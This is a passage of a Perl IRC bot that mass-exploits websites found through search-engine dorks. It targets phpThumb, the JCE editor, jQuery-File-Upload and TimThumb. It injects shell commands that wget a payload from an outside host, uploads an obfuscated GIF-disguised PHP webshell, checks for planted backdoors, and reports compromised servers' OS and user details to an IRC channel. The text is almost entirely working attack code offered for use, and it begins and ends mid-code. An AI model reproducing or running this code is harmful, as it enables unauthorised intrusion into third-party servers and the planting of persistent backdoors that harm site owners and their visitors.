"http://".$site."mambots/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/phpThumb/style.php"; my $c2req = $agent->request(HTTP::Request->new(GET=>$cweb)); if ($c2req->is_success) { #&msg("$chanxxx","![9X]! [ 10".$site." 9]"); sleep(3); my $check = &get_content($cweb."?cek"); if ($check =~ m/404 Not Found/ig) { &msg("$channel","9,1[11-9->>4[8$engine4]9<<-11-9] [ 11UploAdinG 3Data 9]"); sleep(2); my $safe = ""; my $os = ""; my $uid = ""; if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","15(7@2$engine15)(7@2SheLL15)3 $cweb 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); &msg("petology","15(7@2$engine15)(7@2SheLL15)3 $cwebsite 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15)"); &msg("$channel","9,1[11-9->>4[8$engine4]9<<-11-9] [ 3Shell 15(4 SafeMode 15=4 $safe 15) (4 OS 15=4 $os 15) 9]"); } } } my @bdpath = ( "mambots/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/phpThumb/pagat.php", "mambots/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/phpThumb/.grv.php", "mambots/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/phpThumb/.inc.php", "mambots/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/phpThumb/.post.php", "/phpThumb/.grv.php", "/phpThumb/pagat.php", ); my @result = &backdoorCheck($site,@bdpath); if($result[0] ne "false") { sleep(int(rand(3))); &msg("$channel","9,1[11-9->>4[8$engine4]9<<-11-9] [ 4Finder Success 3OK! 9]"); &msg("$admin","15[4+12$engine4+15] 11$result[0] OS: $result[1] SAFEMODE:4$result[2] "); } } } } sub shellsss() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $nick = $_[3]; my $logo = $_[4]; my $crota = "http://".$site.".dlcx.php"; my $crotb = "http://".$site.".dlcx.php"; my $html = &get_content($crota); &queryss("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../.style.php");'); &queryss("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../.style.php");'); my $html = &get_content($crota); my $html9 = &get_content($crotb); if ($html =~ /GIF89a/) { my $safe = ""; my $os = ""; my $uid = ""; if ($html =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![9X]! 11Private Shell 4[3$os4][3safemode10:3 OFF petology irc.private.id4]"); sleep(5); &msg("$admin","$vdlogo 15$engine3 [Success]9 $crota 15(OS=$os) $uid"); sleep(2); } if ($html9 =~ /GIF89a/) { my $safe = ""; my $os = ""; my $uid = ""; if ($html9 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html9 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html9 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$vdlogo 15$engine9 $crotb 15(OS=$os) $uid"); sleep(2); &msg("$channel","![9X]! 11Private Shell 4[3$os4][3safemode10:3 OFF petology irc.private.id4]"); sleep(5); } } sub queryss() { my $target = $_[0]; my $code = "R0lGODlhPD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KHN0cl9yb3QxMygnPThUK3RQVE5xOE5COEhSbVVSZkxzL1FoMWVJWkRlTWVhc1hmVjZDUUx1UDVFZWxsRHZxSmJrN0x4eGZXRncwYWloKy84MUhzV3JFcERlYnM5b2p4VytyQm1NVjB0K0Z0bjIxVE9TcUxOSXZBNURQQjdnemlOZkRuSnRaRnNKWW9CUDVVMjRNRFROKytZYnFtQVEvR3pkdVBtalVPTkpBWVNWMFZrUFZlM0RTR0x6ZGI2ZFdPK2dkZmE0cVFabk5BVHBqa1pTVEQ4Y1M2MFcvSHk5a2xmeHRTUkpiRmpjWmg0L3VEaHUyanRwK3VNL1huQXhLN2RGOWE2QitPbWJNTXdtSS9lWkp0cEtTOUNDTkMrQnZhSWRnYTJramhnZGNhMC9VSGNhcmdYSlhwNG1Ea0gzT0Jsalg5ZVkrOEthcEdsSm82R0szZDZzS0JiNXpHS2gwWDNoMmRRZEhuL2tjb24xaFFkTktORy8xR0JjMzVaalhjSkNlRkJpeWdWN3BRbEtjZzhiV3RLQ2tvaFdleGU2SXk3RW0zSTRIMjQvUVIwQy95M2VuWjgxOUxwbTVXZmZYblZCU3lDL1JndVVsTml2Q1M5b04wSHJkRW5JWWxqeFJXdUM5ZmRwZG81RXMyMW9nbnNPM3Bja0wxbDRhbjErTW1CTWxjSS9YdkZqQjc1ZGY3QW02ZWdJcW85ektsd1BxSTI5MEhaSmUyMU9JNnlCU3FENzc4bi9ES3Vwbktwc0x2R3JsbEFLbVVDeEpDK0M4ZTNnZElnN0dUSG1DSThmb1NsbWppcDBHWHhFK3lMclJMbnNuVEtCbkptcnAxWGRlRlVwaE1ldXhtaEtBWXBySmNlcjcybWNkVkd5emUvMW9BMEhzQjdtck1WRWM5Rno1NnhHVDg5M2Fweit0Y1VyajM2MTNFY3I2SmIxMHBuM2g2SGFkZlpzOU1rY1lJN0tnYzFONUQ3S1RYK3B6TXBybEZJM1V3dFg3enl6SWFnckZzVEh1Q20ya3Vzcm1DY25xOFFNOGMvcnBNWm1nKzYxVWNVM2RkQUVsNjJqSW42SWNwMmFuemliK215amYwb1orQ2dVNy9VeWdSc0RpbytYQXFvMzRZQTJ2SjNlemNyNjhKY0RrYy9yd3AwVExzbzhUMm5sQTlZM2VVejNrRzE3c3haUHNsb3M1MDdpQkJEV1NqL3FVTU1YbGorRE5QbTUrdVh2V2laWHlhNUhxdDdYcGlpR09hRjV4VitwSEFjVVZwZ0hVb3czc3dyTGRsSW1LWU1zSG56djJlZGI3V2tTSDBJTTl0KzQ4alhmQnFtOTRUNFMxYVFrNTVyT3VEK1FhemNvZUJpTnNjbURTckhkRTJ4Q1VBQWNFSkVmT0VDS0puUldoZmdsMEE2dHBBSlVMVjVsY3FLMnlDVFlGSEI2Z1VaVWxxQVBKa0pMcVFPRmFvNnF6aGNZTmJPMFdha0RZMVdBUFV2dVhhRTZ2NUhDUkVDSkVXRnR4NW8zTzJMNEtod0lKZmM1ZFBITFhmMjFPcVhKQkR2cXpSL3FFRDFtbkdGaFFMaFJwWTdRV3B4UmlmQ05BSlBkTXg5U1hFYVJpSjhqVUZUUkVTWnZvYUNVbERlbG9EYXhyUkIwVm9sdE91MjNKdEVEdVdvN2ZhZXVKcjMvZ3JLZkR0WEVMcWRsa1QzOFBJOWZzeWNhcWVVTWZTdTNFRWt0VjA4bFFLL3dEanYva1B2N1BnTGFtYjh2dWZoNEZXc2tJVXpub1JLU2pBM3RKMVBsTWVNclM2ci93V1dmdHYzYkRwZzFhQUJzSGorMEkwT1lHQ0JqQ1Rnc1ZWdksxcDNTUlRiTFNOTXBERWwzdm05b1JKdmt6VUNvWmxTL1JIK2pBNnBIUmpBeGc5b2pUU01JUVM0TzBwK21LdlBUdjljM3laMG1oUDYzdHVSeVdEc0ZGOGMzUHkyZ094U2lIZXUydzRJbVE3WjIwUnhvU09NTTAvWWhxaFJKaGlXRGJHWVppdlNRQkl0czBTZTFyQXc2VEphSkU2VHhRZUlXeXZMOXZqNVZQNjM5QUR0am55ZER5dWV1WWhNd3o3UFFyRFlpWHhUb09WYmpLVHZnalFraFNhZm5POUVnNlREZVBjTmVNS2tVZEJvVUNWcEFid1BhSEMwdXBvWFpkeVRQL3BNQWVOSVBWL1lQS3ZJYzZ2LzlIYkdBR2s2YlNlUFFWWEplaDVHYllYSHF4eVZOOGJRYVFoVEFwQmt6WnlPOWdWcElIeGkyQUlxUms1V0ljTFR0UE82RHVOV28rVlVscEluUzlWdVhRWlVRNXVpTlJXZWtodVZCbFQrMlFycGZrNGhqaG84TGJHUk5OM0tJTkJiZU1GQmZrMGZtdHFUbHBhTlJnVCtjV2toRzdwYnNUMm44RktnUW5uelFxaHNqSHp6dnBGb05YUnNtc1BMRy9Wd2tGdkZxbFEwYVhrd1BvSGpkUHd2ek1jK2xicCt5VjZFSjgrUFloaGZ4VjRNbkswZmZ4ejdBNkh6NEFUM241MHhZSmhIWUJEa1pLbFVaQkNyYnpXYk9VOUNIWk1laWsxaDFIaEt6UkJISFQ5UXE1U3ZzaE51NzJxdnBoeUxWYitSNTFEU3E5SHlXL0M4cVNVWE5vSkZIazVTRTY3WUwxMHhKS2drWHRBU0tMc0pIdkZJNjExZ2dodEhwOXNESEZ4Ly8yZ0RpcGhIQlh4end5SWdWQmwxSmZiWE9Gb3JoN1RCZ1BXR1RZSk9RNzBYc3QxbDBOSnBTNndEUHVPRzB2Z0ttRVN4d0tFU0hkUmt0ckI4QVdTUG45UUpUMEQwdTBNWDJHR2s2Znk4OGJIYkVCSmpMUHh4OTdNVG5yb0d2V2VubE84Z2tQSUpSK215QnlOeHN4Zzc0dCt6Z2Y5aHRha1puUkttUmxmSTMxTUJUU3BpRDB0VllpTjQ0R3U0dS92NUpyTEtCcnhrZ2JiSkZnYi9GemRHdE95VHdiNkp4YzZrUmdVZ0ZDZ1UwUXFLTXVnMG81aStrSWhsY0xoaWtjL3VPZmdhcU43K2ZFVkF1dnp2emh1d2hFV1RTRGtGcHZGNXJNWTlpb2pjWE1FRHY3ZXV0OFViS0VjWFZ4Zmh0cWs2Q05rcGtjWEE0cG1URHNWeW5peU5XU3I0ZHo0cDV2NXZTWXQyMDgzQmlxWC9DaWdDL0o3YzNXdXRUeXdUTU42UTJWdklEVkZKU01Zay9PUGtDbDU4Z0wybTYwYjZFbVcveWVNZXpvUUZCcmZGRnR0UnFQcXdYMGdkSzFUSTNlR3llWUVsZVU4SitwR1pWME5qUFdwY3F2N2dvWFR3U2k4dDRDUjFsVkd5WjFVMHZSQWprWXRpWXRHaktVZFZ4dWlFUitTY240cnZjaFMxYWtpRUhwNURMZVY0VS81bmdoZDZUdlc2aUhidjJrUktTUTNqbEZwTDRycWw0U1N1WHcrRzZHckdUWjFSbWdiRVlQNnFaTkpDTTJoUkozTmlHM1VwenY0d09iUHBPdUJoNm55cmppUnVMREtwSFVScFVDMzBJOUVOc09vZ0xlUTNiU0w5M0wwM1FoNWo2Z2t6RjA4S0RSbW8ydjRvU09UblZ6cmJkdklidWhOS2NjN1pYRmRQRTk1a01HcmYwa2Frak5MeW5WcDBQRnhUQ1NxQkpQUEV3TkF0RDhZRW90WkdMZ1BWZGhxUVgremRsajNPMXBBWDZYYmJNZXpmM1NwVnpHNTJSUVg2MWMrQTJCMCsyQlBpVVpna2FMOHFyaVVxZU0xbnA5ZW55N0s2cEVoRkdrOVp0SytZbWRSTnZYaGFNZEZ2bXVFYlcrN3RsUWFGbU1Ga0MyVnNna0FnaHFicWdMeHVjQ1hvV2JWSTFzUmM0VVIzRXpZbUNqaXp4dCtTZkF5UjBDRWhlOHRxMzk5TVAyck4vUjl0M1Uyb1Q2aEdBMHF1VnYvRDJjZlB5dEJzdzJsaUdCcDl5amsvaWlESnVaUkdwQ1IvUEU2MEdDcUFXU0pVKzJ1aTlDdCtDYzlpYnE0b3cvbTl5TDJVaGwveFI2M3BZNWF3MW5mRzlBTUhnc1FnVmJ3bVFsY3NhYmlzMFlDc2JhT2o3UzF0M1lhNnFsYlV2QnlORXVMdktxWXRDZ1Jib1lyTWRqR1VqbWJQejQxQWZidU1GbHF0Y1dDMFZ4dGFCNnQ3WXFDckJKamIwRmxOV0pBTXc0UVdBb0NPdDFVY3dJUVNlOXpIK1JoLy9WKzVDcnR4a2R3QzhqQ2tCMjN2NGNFK0ZpWGJUQTZxQ2J3eVZPdnpIcVlJS0k5SXVIUDZSdy9NemNXVG1veWhvbmx6VXQ1MW5yNlNoNERlcUVKcWtsd0J6SFpBNkFZaVpQVHFYYk9xR0JPMmlnY3dUM0dBNGlSTGdnSWN3SW0nKSkpKSk7DQo/Pg=="; my $browser = LWP::UserAgent->new; my $res = $browser->post($target."./.style.php",['.style.php'=> $code => 'application/octet-stream'],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub try_xpl1() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [ 6Finish ]"); } my $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101Firefox/14.0.1'); my $shell = "wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.jpg;wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.php"; my $website = "http://".$site."plog-includes/lib/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; my $request = $agent->request(HTTP::Request->new(GET=>$website)); my $cwebsite = "http://".$site."plog-includes/lib/phpthumb/style.jpg"; my $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { my $mvwebsite = "http://".$site."plog-includes/lib/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv style.jpg style.php ; &phpThumbDebug=9"; my $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); my $cweb = "http://".$site."plog-includes/lib/phpthumb/style.php"; my $c2req = $agent->request(HTTP::Request->new(GET=>$cweb)); if ($c2req->is_success) { #&msg("$chanxxx","![9X]! [ 10".$site." 9] "); sleep(3); my $checker = &get_content($cweb."?cek"); sleep(2); if ($checker =~ m/404 Not Found/ig) { &msg("$channel","![9$engine]! [ 11UploAdinG 3Data 9] "); sleep(2); my $safe = ""; my $os = ""; my $uid = ""; if ($checker =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($checker =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($checker =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![9$engine]! 11Private Shell 4[3$os4][3safemode10:3$safe4]"); sleep(5); &msg("$admin","5[4-5=4[8$engine4]5=4-5] 4 $cweb 14[3$os14][3safemode10:3$safe14]"); } } } my @bdpath = ( "plog-includes/lib/phpthumb/pagat.php", "plog-includes/lib/phpthumb/.grv.php", "plog-includes/lib/phpthumb/.inc.jpg", "plog-includes/lib/phpthumb/sem.php", "plog-includes/lib/phpthumb/dilan.php", ); my @result = &backdoorCheck($site,@bdpath); if($result[0] ne "false") { sleep(int(rand(3))); &msg("$channel","![7$engine]! [ 4Finder Success 3OK! ]"); &msg("$admin","15[4+12$engine4+15] 11$result[0] OS: $result[1] SAFEMODE:4$result[2] "); } } } } sub shells1() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $nick = $_[3]; my $logo = $_[4]; my $crota = "http://".$site.".dlcx.php"; my $crotb = "http://".$site.".dlcx.php"; my $html = &get_content($crota); &query1("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../.style.php");'); &query1("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../.style.php");'); my $html = &get_content($crota); my $html9 = &get_content($crotb); if ($html =~ /GIF89a/) { my $safe = ""; my $os = ""; my $uid = ""; if ($html =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![9X]! 11Private Shell 4[3$os4][3safemode10:3 OFF petology irc.private.id4]"); sleep(5); &msg("$admin","$vdlogo 15$engine3 [Success]9 $crota 15(OS=$os) $uid"); sleep(2); } if ($html9 =~ /GIF89a/) { my $safe = ""; my $os = ""; my $uid = ""; if ($html9 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html9 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html9 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$vdlogo 15$engine9 $crotb 15(OS=$os) $uid"); sleep(2); &msg("$channel","![9X]! 11Private Shell 4[3$os4][3safemode10:3 OFF petology irc.private.id4]"); sleep(5); } } sub query1() { my $target = $_[0]; my $code = "R0lGODlhPD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KHN0cl9yb3QxMygnPThUK3RQVE5xOE5COEhSbVVSZkxzL1FoMWVJWkRlTWVhc1hmVjZDUUx1UDVFZWxsRHZxSmJrN0x4eGZXRncwYWloKy84MUhzV3JFcERlYnM5b2p4VytyQm1NVjB0K0Z0bjIxVE9TcUxOSXZBNURQQjdnemlOZkRuSnRaRnNKWW9CUDVVMjRNRFROKytZYnFtQVEvR3pkdVBtalVPTkpBWVNWMFZrUFZlM0RTR0x6ZGI2ZFdPK2dkZmE0cVFabk5BVHBqa1pTVEQ4Y1M2MFcvSHk5a2xmeHRTUkpiRmpjWmg0L3VEaHUyanRwK3VNL1huQXhLN2RGOWE2QitPbWJNTXdtSS9lWkp0cEtTOUNDTkMrQnZhSWRnYTJramhnZGNhMC9VSGNhcmdYSlhwNG1Ea0gzT0Jsalg5ZVkrOEthcEdsSm82R0szZDZzS0JiNXpHS2gwWDNoMmRRZEhuL2tjb24xaFFkTktORy8xR0JjMzVaalhjSkNlRkJpeWdWN3BRbEtjZzhiV3RLQ2tvaFdleGU2SXk3RW0zSTRIMjQvUVIwQy95M2VuWjgxOUxwbTVXZmZYblZCU3lDL1JndVVsTml2Q1M5b04wSHJkRW5JWWxqeFJXdUM5ZmRwZG81RXMyMW9nbnNPM3Bja0wxbDRhbjErTW1CTWxjSS9YdkZqQjc1ZGY3QW02ZWdJcW85ektsd1BxSTI5MEhaSmUyMU9JNnlCU3FENzc4bi9ES3Vwbktwc0x2R3JsbEFLbVVDeEpDK0M4ZTNnZElnN0dUSG1DSThmb1NsbWppcDBHWHhFK3lMclJMbnNuVEtCbkptcnAxWGRlRlVwaE1ldXhtaEtBWXBySmNlcjcybWNkVkd5emUvMW9BMEhzQjdtck1WRWM5Rno1NnhHVDg5M2Fweit0Y1VyajM2MTNFY3I2SmIxMHBuM2g2SGFkZlpzOU1rY1lJN0tnYzFONUQ3S1RYK3B6TXBybEZJM1V3dFg3enl6SWFnckZzVEh1Q20ya3Vzcm1DY25xOFFNOGMvcnBNWm1nKzYxVWNVM2RkQUVsNjJqSW42SWNwMmFuemliK215amYwb1orQ2dVNy9VeWdSc0RpbytYQXFvMzRZQTJ2SjNlemNyNjhKY0RrYy9yd3AwVExzbzhUMm5sQTlZM2VVejNrRzE3c3haUHNsb3M1MDdpQkJEV1NqL3FVTU1YbGorRE5QbTUrdVh2V2laWHlhNUhxdDdYcGlpR09hRjV4VitwSEFjVVZwZ0hVb3czc3dyTGRsSW1LWU1zSG56djJlZGI3V2tTSDBJTTl0KzQ4alhmQnFtOTRUNFMxYVFrNTVyT3VEK1FhemNvZUJpTnNjbURTckhkRTJ4Q1VBQWNFSkVmT0VDS0puUldoZmdsMEE2dHBBSlVMVjVsY3FLMnlDVFlGSEI2Z1VaVWxxQVBKa0pMcVFPRmFvNnF6aGNZTmJPMFdha0RZMVdBUFV2dVhhRTZ2NUhDUkVDSkVXRnR4NW8zTzJMNEtod0lKZmM1ZFBITFhmMjFPcVhKQkR2cXpSL3FFRDFtbkdGaFFMaFJwWTdRV3B4UmlmQ05BSlBkTXg5U1hFYVJpSjhqVUZUUkVTWnZvYUNVbERlbG9EYXhyUkIwVm9sdE91MjNKdEVEdVdvN2ZhZXVKcjMvZ3JLZkR0WEVMcWRsa1QzOFBJOWZzeWNhcWVVTWZTdTNFRWt0VjA4bFFLL3dEanYva1B2N1BnTGFtYjh2dWZoNEZXc2tJVXpub1JLU2pBM3RKMVBsTWVNclM2ci93V1dmdHYzYkRwZzFhQUJzSGorMEkwT1lHQ0JqQ1Rnc1ZWdksxcDNTUlRiTFNOTXBERWwzdm05b1JKdmt6VUNvWmxTL1JIK2pBNnBIUmpBeGc5b2pUU01JUVM0TzBwK21LdlBUdjljM3laMG1oUDYzdHVSeVdEc0ZGOGMzUHkyZ094U2lIZXUydzRJbVE3WjIwUnhvU09NTTAvWWhxaFJKaGlXRGJHWVppdlNRQkl0czBTZTFyQXc2VEphSkU2VHhRZUlXeXZMOXZqNVZQNjM5QUR0am55ZER5dWV1WWhNd3o3UFFyRFlpWHhUb09WYmpLVHZnalFraFNhZm5POUVnNlREZVBjTmVNS2tVZEJvVUNWcEFid1BhSEMwdXBvWFpkeVRQL3BNQWVOSVBWL1lQS3ZJYzZ2LzlIYkdBR2s2YlNlUFFWWEplaDVHYllYSHF4eVZOOGJRYVFoVEFwQmt6WnlPOWdWcElIeGkyQUlxUms1V0ljTFR0UE82RHVOV28rVlVscEluUzlWdVhRWlVRNXVpTlJXZWtodVZCbFQrMlFycGZrNGhqaG84TGJHUk5OM0tJTkJiZU1GQmZrMGZtdHFUbHBhTlJnVCtjV2toRzdwYnNUMm44RktnUW5uelFxaHNqSHp6dnBGb05YUnNtc1BMRy9Wd2tGdkZxbFEwYVhrd1BvSGpkUHd2ek1jK2xicCt5VjZFSjgrUFloaGZ4VjRNbkswZmZ4ejdBNkh6NEFUM241MHhZSmhIWUJEa1pLbFVaQkNyYnpXYk9VOUNIWk1laWsxaDFIaEt6UkJISFQ5UXE1U3ZzaE51NzJxdnBoeUxWYitSNTFEU3E5SHlXL0M4cVNVWE5vSkZIazVTRTY3WUwxMHhKS2drWHRBU0tMc0pIdkZJNjExZ2dodEhwOXNESEZ4Ly8yZ0RpcGhIQlh4end5SWdWQmwxSmZiWE9Gb3JoN1RCZ1BXR1RZSk9RNzBYc3QxbDBOSnBTNndEUHVPRzB2Z0ttRVN4d0tFU0hkUmt0ckI4QVdTUG45UUpUMEQwdTBNWDJHR2s2Znk4OGJIYkVCSmpMUHh4OTdNVG5yb0d2V2VubE84Z2tQSUpSK215QnlOeHN4Zzc0dCt6Z2Y5aHRha1puUkttUmxmSTMxTUJUU3BpRDB0VllpTjQ0R3U0dS92NUpyTEtCcnhrZ2JiSkZnYi9GemRHdE95VHdiNkp4YzZrUmdVZ0ZDZ1UwUXFLTXVnMG81aStrSWhsY0xoaWtjL3VPZmdhcU43K2ZFVkF1dnp2emh1d2hFV1RTRGtGcHZGNXJNWTlpb2pjWE1FRHY3ZXV0OFViS0VjWFZ4Zmh0cWs2Q05rcGtjWEE0cG1URHNWeW5peU5XU3I0ZHo0cDV2NXZTWXQyMDgzQmlxWC9DaWdDL0o3YzNXdXRUeXdUTU42UTJWdklEVkZKU01Zay9PUGtDbDU4Z0wybTYwYjZFbVcveWVNZXpvUUZCcmZGRnR0UnFQcXdYMGdkSzFUSTNlR3llWUVsZVU4SitwR1pWME5qUFdwY3F2N2dvWFR3U2k4dDRDUjFsVkd5WjFVMHZSQWprWXRpWXRHaktVZFZ4dWlFUitTY240cnZjaFMxYWtpRUhwNURMZVY0VS81bmdoZDZUdlc2aUhidjJrUktTUTNqbEZwTDRycWw0U1N1WHcrRzZHckdUWjFSbWdiRVlQNnFaTkpDTTJoUkozTmlHM1VwenY0d09iUHBPdUJoNm55cmppUnVMREtwSFVScFVDMzBJOUVOc09vZ0xlUTNiU0w5M0wwM1FoNWo2Z2t6RjA4S0RSbW8ydjRvU09UblZ6cmJkdklidWhOS2NjN1pYRmRQRTk1a01HcmYwa2Frak5MeW5WcDBQRnhUQ1NxQkpQUEV3TkF0RDhZRW90WkdMZ1BWZGhxUVgremRsajNPMXBBWDZYYmJNZXpmM1NwVnpHNTJSUVg2MWMrQTJCMCsyQlBpVVpna2FMOHFyaVVxZU0xbnA5ZW55N0s2cEVoRkdrOVp0SytZbWRSTnZYaGFNZEZ2bXVFYlcrN3RsUWFGbU1Ga0MyVnNna0FnaHFicWdMeHVjQ1hvV2JWSTFzUmM0VVIzRXpZbUNqaXp4dCtTZkF5UjBDRWhlOHRxMzk5TVAyck4vUjl0M1Uyb1Q2aEdBMHF1VnYvRDJjZlB5dEJzdzJsaUdCcDl5amsvaWlESnVaUkdwQ1IvUEU2MEdDcUFXU0pVKzJ1aTlDdCtDYzlpYnE0b3cvbTl5TDJVaGwveFI2M3BZNWF3MW5mRzlBTUhnc1FnVmJ3bVFsY3NhYmlzMFlDc2JhT2o3UzF0M1lhNnFsYlV2QnlORXVMdktxWXRDZ1Jib1lyTWRqR1VqbWJQejQxQWZidU1GbHF0Y1dDMFZ4dGFCNnQ3WXFDckJKamIwRmxOV0pBTXc0UVdBb0NPdDFVY3dJUVNlOXpIK1JoLy9WKzVDcnR4a2R3QzhqQ2tCMjN2NGNFK0ZpWGJUQTZxQ2J3eVZPdnpIcVlJS0k5SXVIUDZSdy9NemNXVG1veWhvbmx6VXQ1MW5yNlNoNERlcUVKcWtsd0J6SFpBNkFZaVpQVHFYYk9xR0JPMmlnY3dUM0dBNGlSTGdnSWN3SW0nKSkpKSk7DQo/Pg=="; my $browser = LWP::UserAgent->new; my $res = $browser->post($target."./.style.php",['.style.php'=> $code => 'application/octet-stream'],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub try_xpl2() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [ 6Finish ]"); } my $bx = "http://".$site."assets/global/plugins/jquery-file-upload/server/php/"; my $ua = LWP::UserAgent->new; $ua->timeout(10); my $exploit = $ua->post($bx, ['files' => ['style.php']],'Content-Type' => 'form-data'); if ($exploit->decoded_content =~ /files/) { my $check = $ua->get("http://".$site."assets/global/plugins/jquery-file-upload/server/php/files/style.php")->content; if($check =~/
/) { my $test = "http://".$site."assets/global/plugins/jquery-file-upload/server/php/files/style.php"; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $cekap = &get_content($test."?cek"); if ($cekap =~ m/404 Not Found/ig) { my $safe = ""; my $os = ""; my $uid = ""; if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($cekap =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![9$engine]! [12Shell 3(SafeMode=$safe) (OS=$os) $uid ]"); &msg("$admin","$assetslogo15$engine 4<9=4>4 sHeLL 4<9=4>4 ".$test."12 (SafeMode=$safe) (OS=$os) $uid "); &msg("$nick","$assetslogo15$engine 4<9=4>4 sukses cuy $test 4<9=4>12 (SafeMode=$safe) (OS=$os) $uid "); } } exit; } } } my @bdpath = ( "assets/global/plugins/jquery-file-upload/server/php/files/pagat.php", "assets/global/plugins/jquery-file-upload/server/php/files/.grv.php", "assets/global/plugins/jquery-file-upload/server/php/files/.post.php", "/phpThumb/.grv.php", "/phpThumb/pagat.php", ); my @result = &backdoorCheck($site,@bdpath); if($result[0] ne "false") { sleep(int(rand(3))); &msg("$channel","![7$engine]! [ 4Finder Success 3OK! ]"); &msg("$admin","15[4+12$engine4+15] 11$result[0] OS: $result[1] SAFEMODE:4$result[2] ");} } } } ################################################################################################# sub timthumb() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = search_engine($chan,$bug,$dork,$engine,$timlogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [ 10Scan finish ]"); } if(my $proses = fork){ waitpid($proses, 0); } else { if(fork){ exit; } else { my $caritema = &Query("http://".$site); if($caritema =~ /src=\"http:\/\/(.+?)\/wp-content\/(.+?)\.php\?src=/i){ my $vulns = $1; my $cobabika = "http://".$vulns."/wp-content/".$2.".php?src=".$timrid; my $buke = &Query($cobabika); if($buke =~ /Unable to open image(.*?)\/wp-content\/(.+?)\.php/i){ my $shellgue = $2; my $chkurl = &ReadLogs("TIM.URL",md5_hex($cobabika)); if($chkurl == 0){ &WriteLogs("TIM.URL",md5_hex($cobabika)); &msg("$channel","![13X]! Exploiting => 14".$vulns." ![13*]!"); my $cobadulu = "http://".$vulns."/wp-content/".$shellgue.".php"; my $cobacobi = &Query($cobadulu); if($cobacobi =~ /MODE : (.*?)<\/B>
/i){ $infone = $1; if($cobacobi =~ /Uname : (.*?)<\/B>
/i){ $unames = $1; } $cobadulu=~s/ /\%20/g; &msg("$admin","![4TIM-Vuln]! [14 SAFE ".$infone." - ".$unames." ] [12 ".$cobadulu."?png ] [14 ".$cobabika." ]"); &msg("$channel","![4TIM-Vuln]! [14 SAFE ".$infone." - ".$unames." ] [12 Check ]"); &Query($cobadulu."?bot", 1); } } sleep(3); } } elsif($caritema =~ /src=\"http:\/\/(.+?)\.php\?src=/i){ my $posisi = $1; my $cobaboku = "http://".$posisi.".php?src=".$timrid; my $buki = &Query($cobaboku); if($buki =~ /Unable to open image(.+?)\.php/i){ $manual = $1; if($manual !~ /<\/li><\/ul>/){ $manual=~s/://g; $manual=~s/^\s+|\s+$//g; $manual=~s/ /\%20/g; $posisi=~s/ /\%20/g; my $chkurl = 